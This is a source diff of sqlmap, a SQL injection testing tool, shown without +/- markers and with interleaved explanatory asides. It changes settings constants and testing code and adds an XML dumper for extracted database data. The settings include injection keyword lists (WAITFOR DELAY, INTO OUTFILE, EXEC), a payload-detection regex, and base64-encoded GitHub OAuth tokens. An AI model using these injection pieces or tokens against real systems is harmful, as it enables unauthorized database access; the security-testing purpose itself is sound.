SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
SUPPORTED_OS = ("linux", "windows")
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
@@ -307,10 +297,9 @@ FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P
ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)"
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$"
)
# Regular expression used for parsing charset info from meta html headers
@@ -374,7 +363,7 @@ MIN_ERROR_CHUNK_LENGTH = 8
MAX_ERROR_CHUNK_LENGTH = 1024
# Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "DBINFO(", "'%s'" % CHAR_INFERENCE_MARK)
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
@@ -469,7 +458,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -517,20 +506,20 @@ PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10
# Maximum number of times for revalidation of a character in inference (as required)
MAX_REVALIDATION_STEPS = 5
# Maximum number of times for revalidation of a character in time-based injections
MAX_TIME_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
PARAMETER_SPLITTING_REGEX = r"[,|;]"
PARAMETER_SPLITTING_REGEX = r'[,|;]'
# Regular expression describing possible union char value (e.g. used in --union-char)
UNION_CHAR_REGEX = r"\A\w+\Z"
UNION_CHAR_REGEX = r'\A\w+\Z'
# Attribute used for storing original parameter value in special cases (e.g. POST)
UNENCODED_ORIGINAL_VALUE = "original"
UNENCODED_ORIGINAL_VALUE = 'original'
# Common column names containing usernames (used for hash cracking in some cases)
COMMON_USER_COLUMNS = ("user", "username", "user_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor")
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
# Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&'
@@ -542,7 +531,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA=="
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
@@ -554,7 +543,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "BkfRWrtCYK" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -580,9 +569,6 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
# Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
# Minor artistic touch
BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
@@ -596,7 +582,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger)
MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -617,7 +603,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
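Outside the diff, a hedged sketch of how such patterns are typically consumed: a substring check that decides whether a log line gets ANSI bold. This illustrates the idea only and is not sqlmap's actual log handler:

BOLD_PATTERNS = ("' injectable", "is not injectable", "test failed", "test passed")

def boldify(message):
    # Wrap the message in ANSI bold escapes when any pattern is present
    if any(pattern in message for pattern in BOLD_PATTERNS):
        return "\033[1m%s\033[0m" % message
    return message

print(boldify("GET parameter 'id' is not injectable"))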
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

View File

@@ -68,6 +68,7 @@ from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import XML_RECOGNITION_REGEX
from lib.utils.hashdb import HashDB
from lib.core.xmldump import dumper as xmldumper
from thirdparty.odict.odict import OrderedDict
def _setRequestParams():
@@ -592,7 +593,11 @@ def _createDumpDir():
conf.dumpPath = tempDir
def _configureDumper():
conf.dumper = dumper
if hasattr(conf, 'xmlFile') and conf.xmlFile:
conf.dumper = xmldumper
else:
conf.dumper = dumper
conf.dumper.setOutputFile()
def _createTargetDirs():

View File

@@ -41,8 +41,6 @@ class Failures(object):
failedParseOn = None
failedTraceBack = None
_failures = Failures()
def smokeTest():
"""
Runs the basic smoke testing of a program
@@ -55,17 +53,16 @@ def smokeTest():
if any(_ in root for _ in ("thirdparty", "extra")):
continue
for filename in files:
if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
length += 1
for ifile in files:
length += 1
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
if any(_ in root for _ in ("thirdparty", "extra")):
continue
for filename in files:
if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
path = os.path.join(root, os.path.splitext(filename)[0])
for ifile in files:
if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py":
path = os.path.join(root, os.path.splitext(ifile)[0])
path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
path = path.replace(os.sep, '.').lstrip('.')
try:
@@ -74,7 +71,7 @@ def smokeTest():
except Exception, msg:
retVal = False
dataToStdout("\r")
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg)
logger.error(errMsg)
else:
# Run doc tests
@@ -83,9 +80,9 @@ def smokeTest():
if failure_count > 0:
retVal = False
count += 1
status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
count += 1
status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
clearConsoleLine()
if retVal:
@@ -195,11 +192,11 @@ def liveTest():
else:
errMsg = "test failed"
if _failures.failedItems:
errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems)
if Failures.failedItems:
errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems)
errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
errMsg += " - traceback: %s" % bool(_failures.failedTraceBack)
errMsg += " - traceback: %s" % bool(Failures.failedTraceBack)
if not vulnerable:
errMsg += " - SQL injection not detected"
@@ -207,14 +204,14 @@ def liveTest():
logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg)
if _failures.failedParseOn:
if Failures.failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
console_output_fd.write(_failures.failedParseOn)
console_output_fd.write(Failures.failedParseOn)
console_output_fd.close()
if _failures.failedTraceBack:
if Failures.failedTraceBack:
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
traceback_fd.write(_failures.failedTraceBack)
traceback_fd.write(Failures.failedTraceBack)
traceback_fd.close()
beep()
@@ -235,9 +232,9 @@ def liveTest():
return retVal
def initCase(switches, count):
_failures.failedItems = []
_failures.failedParseOn = None
_failures.failedTraceBack = None
Failures.failedItems = []
Failures.failedParseOn = None
Failures.failedTraceBack = None
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count))
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
@@ -281,10 +278,10 @@ def runCase(parse):
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
if unhandled_exception:
_failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
retVal = None
elif handled_exception:
_failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
retVal = None
elif result is False: # this means no SQL injection has been detected - if None, ignore
retVal = False
@@ -301,17 +298,17 @@ def runCase(parse):
if item.startswith("r'") and item.endswith("'"):
if not re.search(item[2:-1], parse_on, re.DOTALL):
retVal = None
_failures.failedItems.append(item)
Failures.failedItems.append(item)
elif item not in parse_on:
retVal = None
_failures.failedItems.append(item)
Failures.failedItems.append(item)
if _failures.failedItems:
_failures.failedParseOn = console
if Failures.failedItems:
Failures.failedParseOn = console
elif retVal is False:
_failures.failedParseOn = console
Failures.failedParseOn = console
return retVal

View File

@@ -42,7 +42,6 @@ class _ThreadData(threading.local):
self.disableStdOut = False
self.hashDBCursor = None
self.inTransaction = False
self.lastCode = None
self.lastComparisonPage = None
self.lastComparisonHeaders = None
self.lastComparisonCode = None
@@ -59,7 +58,6 @@ class _ThreadData(threading.local):
self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None)
self.shared = shared
self.validationRun = 0
self.valueStack = []
ThreadData = _ThreadData()

lib/core/xmldump.py Normal file (536 lines)
View File

@@ -0,0 +1,536 @@
#!/usr/bin/env python
import codecs
import os
import re
import xml
import xml.sax.saxutils as saxutils
from lib.core.common import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapFilePathException
from lib.core.settings import UNICODE_ENCODING
from thirdparty.prettyprint import prettyprint
from xml.dom.minidom import Document
from xml.parsers.expat import ExpatError
TECHNIC_ELEM_NAME = "Technic"
TECHNICS_ELEM_NAME = "Technics"
BANNER_ELEM_NAME = "Banner"
COLUMNS_ELEM_NAME = "DatabaseColumns"
COLUMN_ELEM_NAME = "Column"
CELL_ELEM_NAME = "Cell"
COLUMN_ATTR = "column"
ROW_ELEM_NAME = "Row"
TABLES_ELEM_NAME = "tables"
DATABASE_COLUMNS_ELEM = "DB"
DB_TABLES_ELEM_NAME = "DBTables"
DB_TABLE_ELEM_NAME = "DBTable"
IS_DBA_ELEM_NAME = "isDBA"
FILE_CONTENT_ELEM_NAME = "FileContent"
DB_ATTR = "db"
UNKNOWN_COLUMN_TYPE = "unknown"
USER_SETTINGS_ELEM_NAME = "UserSettings"
USER_SETTING_ELEM_NAME = "UserSetting"
USERS_ELEM_NAME = "Users"
USER_ELEM_NAME = "User"
DB_USER_ELEM_NAME = "DBUser"
SETTINGS_ELEM_NAME = "Settings"
DBS_ELEM_NAME = "DBs"
DB_NAME_ELEM_NAME = "DBName"
DATABASE_ELEM_NAME = "Database"
TABLE_ELEM_NAME = "Table"
DB_TABLE_VALUES_ELEM_NAME = "DBTableValues"
DB_VALUES_ELEM = "DBValues"
QUERIES_ELEM_NAME = "Queries"
QUERY_ELEM_NAME = "Query"
REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries"
REGISTER_DATA_ELEM_NAME = "RegisterData"
DEFAULT_DB = "All"
MESSAGE_ELEM = "Message"
MESSAGES_ELEM_NAME = "Messages"
ERROR_ELEM_NAME = "Error"
LST_ELEM_NAME = "List"
LSTS_ELEM_NAME = "Lists"
CURRENT_USER_ELEM_NAME = "CurrentUser"
CURRENT_DB_ELEM_NAME = "CurrentDB"
MEMBER_ELEM = "Member"
ADMIN_USER = "Admin"
REGULAR_USER = "User"
STATUS_ELEM_NAME = "Status"
RESULTS_ELEM_NAME = "Results"
UNHANDLED_PROBLEM_TYPE = "Unhandled"
NAME_ATTR = "name"
TYPE_ATTR = "type"
VALUE_ATTR = "value"
SUCESS_ATTR = "success"
NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance'
XMLNS_ATTR = "xmlns:xsi"
SCHEME_NAME = "sqlmap.xsd"
SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation"
CHARACTERS_TO_ENCODE = range(32) + range(127, 256)
ENTITIES = {'"': '&quot;', "'": "&apos;"}
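For context (not part of the diff), the ENTITIES mapping simply extends xml.sax.saxutils.escape() beyond its default handling of &, < and >:

import xml.sax.saxutils as saxutils

ENTITIES = {'"': '&quot;', "'": '&apos;'}

# Escapes &, < and > by default, plus the two quote characters above
print(saxutils.escape('O\'Brien said "<hi>"', ENTITIES))
# O&apos;Brien said &quot;&lt;hi&gt;&quot;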
class XMLDump(object):
'''
This class' purpose is to dump the data into an XML format.
The format of the XML file is described in the schema file xml/sqlmap.xsd
'''
def __init__(self):
self._outputFile = None
self._outputFP = None
self.__root = None
self.__doc = Document()
def _addToRoot(self, element):
'''
Adds element to the root element
'''
self.__root.appendChild(element)
def __write(self, data, n=True):
'''
Writes the data into the file
'''
if n:
self._outputFP.write("%s\n" % data)
else:
self._outputFP.write("%s " % data)
self._outputFP.flush()
kb.dataOutputFlag = True
def _getRootChild(self, elemName):
'''
Returns the child of the root with the described name
'''
elements = self.__root.getElementsByTagName(elemName)
if elements:
return elements[0]
return elements
def _createTextNode(self, data):
'''
Creates a text node with UTF-8 data inside.
The text is escaped to fit the XML text format.
'''
if data is None:
return self.__doc.createTextNode(u'')
else:
escaped_data = saxutils.escape(data, ENTITIES)
return self.__doc.createTextNode(escaped_data)
def _createAttribute(self, attrName, attrValue):
'''
Creates an attribute node with UTF-8 data inside.
The text is escaped to fit the XML text format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None:
attr.nodeValue = u''
else:
attr.nodeValue = getUnicode(attrValue)
return attr
def string(self, header, data, sort=True):
'''
Adds string element to the xml.
'''
if isinstance(data, (list, tuple, set)):
self.lister(header, data, sort)
return
messagesElem = self._getRootChild(MESSAGES_ELEM_NAME)
if (not(messagesElem)):
messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME)
self._addToRoot(messagesElem)
if data:
data = self._formatString(data)
else:
data = ""
elem = self.__doc.createElement(MESSAGE_ELEM)
elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
elem.appendChild(self._createTextNode(data))
messagesElem.appendChild(elem)
def lister(self, header, elements, sort=True):
'''
Adds information formatted as list element
'''
lstElem = self.__doc.createElement(LST_ELEM_NAME)
lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if elements:
if sort:
try:
elements = set(elements)
elements = list(elements)
elements.sort(key=lambda x: x.lower())
except:
pass
for element in elements:
memberElem = self.__doc.createElement(MEMBER_ELEM)
lstElem.appendChild(memberElem)
if isinstance(element, basestring):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElem.appendChild(self._createTextNode(element))
elif isinstance(element, (list, tuple, set)):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list"))
for e in element:
memberElemStr = self.__doc.createElement(MEMBER_ELEM)
memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElemStr.appendChild(self._createTextNode(getUnicode(e)))
memberElem.appendChild(memberElemStr)
listsElem = self._getRootChild(LSTS_ELEM_NAME)
if not(listsElem):
listsElem = self.__doc.createElement(LSTS_ELEM_NAME)
self._addToRoot(listsElem)
listsElem.appendChild(lstElem)
def technic(self, technicType, data):
'''
Adds information about the technique used to extract data from the db
'''
technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME)
technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType))
textNode = self._createTextNode(data)
technicElem.appendChild(textNode)
technicsElem = self._getRootChild(TECHNICS_ELEM_NAME)
if not(technicsElem):
technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME)
self._addToRoot(technicsElem)
technicsElem.appendChild(technicElem)
def banner(self, data):
'''
Adds information about the database banner to the xml.
The banner contains information about the type and the version of the database.
'''
bannerElem = self.__doc.createElement(BANNER_ELEM_NAME)
bannerElem.appendChild(self._createTextNode(data))
self._addToRoot(bannerElem)
def currentUser(self, data):
'''
Adds information about the current database user to the xml
'''
currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME)
textNode = self._createTextNode(data)
currentUserElem.appendChild(textNode)
self._addToRoot(currentUserElem)
def currentDb(self, data):
'''
Adds information about the current database in use to the xml
'''
currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME)
textNode = self._createTextNode(data)
currentDBElem.appendChild(textNode)
self._addToRoot(currentDBElem)
def dba(self, isDBA):
'''
Adds information to the xml that indicates whether the user has DBA privileges
'''
isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME)
isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA)))
self._addToRoot(isDBAElem)
def users(self, users):
'''
Adds a list of the existing users to the xml
'''
usersElem = self.__doc.createElement(USERS_ELEM_NAME)
if isinstance(users, basestring):
users = [users]
if users:
for user in users:
userElem = self.__doc.createElement(DB_USER_ELEM_NAME)
usersElem.appendChild(userElem)
userElem.appendChild(self._createTextNode(user))
self._addToRoot(usersElem)
def dbs(self, dbs):
'''
Adds a list of the existing databases to the xml
'''
dbsElem = self.__doc.createElement(DBS_ELEM_NAME)
if dbs:
for db in dbs:
dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME)
dbsElem.appendChild(dbElem)
dbElem.appendChild(self._createTextNode(db))
self._addToRoot(dbsElem)
def userSettings(self, header, userSettings, subHeader):
'''
Adds information about the user's settings to the xml.
The information can be the user's passwords, privileges, etc.
'''
self._areAdmins = set()
userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME)
if (not(userSettingsElem)):
userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME)
self._addToRoot(userSettingsElem)
userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME)
userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if isinstance(userSettings, (tuple, list, set)):
self._areAdmins = userSettings[1]
userSettings = userSettings[0]
users = userSettings.keys()
users.sort(key=lambda x: x.lower())
for user in users:
userElem = self.__doc.createElement(USER_ELEM_NAME)
userSettingElem.appendChild(userElem)
if user in self._areAdmins:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER))
else:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER))
settings = userSettings[user]
settings.sort()
for setting in settings:
settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME)
settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader))
settingTextNode = self._createTextNode(setting)
settingsElem.appendChild(settingTextNode)
userElem.appendChild(settingsElem)
userSettingsElem.appendChild(userSettingElem)
def dbTables(self, dbTables):
'''
Adds information about the existing db tables to the xml
'''
if not isinstance(dbTables, dict):
self.string(TABLES_ELEM_NAME, dbTables)
return
dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME)
for db, tables in dbTables.items():
tables.sort(key=lambda x: x.lower())
dbElem = self.__doc.createElement(DATABASE_ELEM_NAME)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
dbTablesElem.appendChild(dbElem)
for table in tables:
tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME)
tableElem.appendChild(self._createTextNode(table))
dbElem.appendChild(tableElem)
self._addToRoot(dbTablesElem)
def dbTableColumns(self, tableColumns):
'''
Adds information about the columns of the existing tables to the xml
'''
columnsElem = self._getRootChild(COLUMNS_ELEM_NAME)
if not(columnsElem):
columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME)
for db, tables in tableColumns.items():
if not db:
db = DEFAULT_DB
dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
columnsElem.appendChild(dbElem)
for table, columns in tables.items():
tableElem = self.__doc.createElement(TABLE_ELEM_NAME)
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
colList = columns.keys()
colList.sort(key=lambda x: x.lower())
for column in colList:
colType = columns[column]
colElem = self.__doc.createElement(COLUMN_ELEM_NAME)
if colType is not None:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType))
else:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE))
colElem.appendChild(self._createTextNode(column))
tableElem.appendChild(colElem)
self._addToRoot(columnsElem)
def dbTableValues(self, tableValues):
'''
Adds the values of a specific table to the xml.
The values are organized according to the relevant row and column.
'''
tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME)
if (tableValues is not None):
db = tableValues["__infos__"]["db"]
if not db:
db = "All"
table = tableValues["__infos__"]["table"]
count = int(tableValues["__infos__"]["count"])
columns = tableValues.keys()
columns.sort(key=lambda x: x.lower())
tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db))
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
for i in range(count):
rowElem = self.__doc.createElement(ROW_ELEM_NAME)
tableElem.appendChild(rowElem)
for column in columns:
if column != "__infos__":
info = tableValues[column]
value = info["values"][i]
if re.search("^[\ *]*$", value):
value = "NULL"
cellElem = self.__doc.createElement(CELL_ELEM_NAME)
cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column))
cellElem.appendChild(self._createTextNode(value))
rowElem.appendChild(cellElem)
dbValuesElem = self._getRootChild(DB_VALUES_ELEM)
if (not(dbValuesElem)):
dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM)
self._addToRoot(dbValuesElem)
dbValuesElem.appendChild(tableElem)
logger.info("Table '%s.%s' dumped to XML file" % (db, table))
def dbColumns(self, dbColumns, colConsider, dbs):
'''
Adds information about the columns
'''
for column in dbColumns.keys():
printDbs = {}
for db, tblData in dbs.items():
for tbl, colData in tblData.items():
for col, dataType in colData.items():
if column in col:
if db in printDbs:
if tbl in printDbs[db]:
